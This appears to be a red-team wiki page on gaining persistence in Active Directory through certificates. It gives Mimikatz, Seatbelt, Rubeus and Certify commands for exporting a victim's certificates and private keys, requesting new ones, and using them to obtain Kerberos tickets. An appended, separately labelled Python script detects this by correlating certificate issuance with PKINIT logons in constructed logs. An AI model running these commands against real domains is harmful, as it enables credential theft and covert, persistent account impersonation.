Persistence via Certificates - CraigDonkin/Infrastructure GitHub Wiki

  • Scenario: you have compromised a user account or a computer account.

Enumerate the certificates the victim currently has

Seatbelt

Seatbelt.exe certificates

Mimikatz

mimikatz crypto::certificates
mimikatz crypto::certificates /systemstore:<name> /store:<name>

Export their certificates

Mimikatz

mimikatz crypto::certificates /export
mimikatz crypto::certificates /systemstore:<name> /store:<name> /export
mimikatz crypto::certificates /systemstore:local_machine /export
  • When exporting with mimikatz, the password set on the exported private key (.pfx) is mimikatz.
  • To extract a machine certificate, local admin permissions are needed.

Use the certificate to get a TGT

Rubeus.exe asktgt /user:<username> /certificate:<base64 of certificate> /password:<password> /nowrap
Rubeus.exe asktgt /user:<machine account>$ /enctype:aes256 /certificate:<base64 of certificate> /password:<password> /nowrap

Request a certificate for the victim

Certify.exe request /ca:<certificate authority> /template:<template name>
Certify.exe request /ca:<certificate authority> /template:<template name> /machine
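Added defender-side example, not part of the wiki: the certificate request and the certificate-based TGT request above leave two footprints, a 4887 "certificate issued" event on the CA and a 4768 TGT request on the DC whose Pre-Authentication Type is 16 (PKINIT). The script below correlates the two within a time window and also lists PKINIT logons by accounts that are not on a smart-card allowlist. The log format, hosts and account names are all constructed for the example.

```python
"""Correlate CA issuance (4887) with PKINIT TGT requests (4768) over constructed logs."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs), pipe-delimited: time|event id|log source|k=v...
# 4887 = Certificate Services issued a certificate (CA security log)
# 4768 = Kerberos TGT requested (DC security log); preauth=16 means PKINIT (certificate)
SAMPLE_EVENTS = """\
2024-05-01T09:00:00|4887|CA01|requester=CORP\\jsmith|template=User
2024-05-01T09:02:30|4768|DC01|account=jsmith|preauth=2|src=10.0.5.17
2024-05-01T10:15:00|4887|CA01|requester=CORP\\WS-FIN-03$|template=Machine
2024-05-01T10:16:10|4768|DC01|account=WS-FIN-03$|preauth=16|src=10.0.9.44
2024-05-01T11:00:00|4768|DC01|account=admin.card|preauth=16|src=10.0.1.5
"""
PKINIT = "16"
WINDOW = timedelta(hours=1)  # issuance-to-TGT window; tune to the environment


def parse(text):
    events = []
    for line in text.strip().splitlines():
        ts, eid, source, *kv = line.split("|")
        fields = dict(p.split("=", 1) for p in kv)
        fields.update(ts=datetime.fromisoformat(ts), id=eid, source=source)
        events.append(fields)
    return events


def normalise(name):
    """Strip a DOMAIN\\ prefix and lower-case so CA and DC spellings match."""
    return name.split("\\")[-1].lower()


def find_cert_then_pkinit(events):
    """(account, issued_at, tgt_at) for accounts that got a certificate issued and
    then obtained a TGT with PKINIT within WINDOW of the issuance."""
    issued = defaultdict(list)
    for e in events:
        if e["id"] == "4887":
            issued[normalise(e["requester"])].append(e["ts"])
    hits = []
    for e in events:
        if e["id"] == "4768" and e["preauth"] == PKINIT:
            acct = normalise(e["account"])
            for t in issued.get(acct, []):
                if timedelta(0) <= e["ts"] - t <= WINDOW:
                    hits.append((acct, t, e["ts"]))
    return hits


def pkinit_without_smartcard(events, known_smartcard_users):
    """Accounts that authenticated with PKINIT but are not expected to use certificates."""
    return sorted({normalise(e["account"]) for e in events
                   if e["id"] == "4768" and e["preauth"] == PKINIT
                   and normalise(e["account"]) not in known_smartcard_users})
```

Both rules are starting points: a machine account that never used PKINIT before and a fresh issuance followed minutes later by a certificate logon are the signals worth alerting on, while legitimate smart-card users need the allowlist.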